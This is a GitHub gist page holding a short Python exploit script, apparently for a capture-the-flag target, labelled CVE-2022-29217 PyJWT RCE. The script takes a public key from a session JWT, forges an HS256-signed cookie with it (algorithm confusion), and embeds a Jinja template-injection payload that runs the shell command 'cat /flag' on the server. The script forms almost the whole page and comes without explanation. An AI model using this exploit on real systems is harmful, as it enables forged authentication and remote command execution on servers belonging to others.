Skip to content

Instantly share code, notes, and snippets.

@s3rgeym

s3rgeym/exploit.py

Forked from seifallahhomrani1/exploit.py
Last active August 24, 2022 01:48
Show Gist options
  • Save s3rgeym/ee29859cb16cb6b8bee35426c104e2cd to your computer and use it in GitHub Desktop.
Save s3rgeym/ee29859cb16cb6b8bee35426c104e2cd to your computer and use it in GitHub Desktop.
Download ZIP
CVE-2022-29217 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! PYJWT RCE
Raw
exploit.py
import requests
import jwt
import base64
import json
def extract_pub_key(session_cookie):
return base64.b64decode(json.loads(base64.b64decode((session_cookie.cookies.get_dict()['session'].split('.'))[1] + '=='))['pub'])
ip = "http://127.0.0.1" #change it
port = "5000" #change it
s = requests.Session()
s.get(f'{ip}:{port}/')
session_cookie = s.get(f'{ip}:{port}/e')
pub_key_bytes = extract_pub_key(session_cookie)
SSTI_Payload = "{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('cat /flag').read() }}"
bad_session_cookie = str(jwt.encode({"Name": SSTI_Payload} , pub_key_bytes, algorithm="HS256"))
s.cookies.set("session",bad_session_cookie)
flag = s.get(f'{ip}:{port}/e')
print(flag.text)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment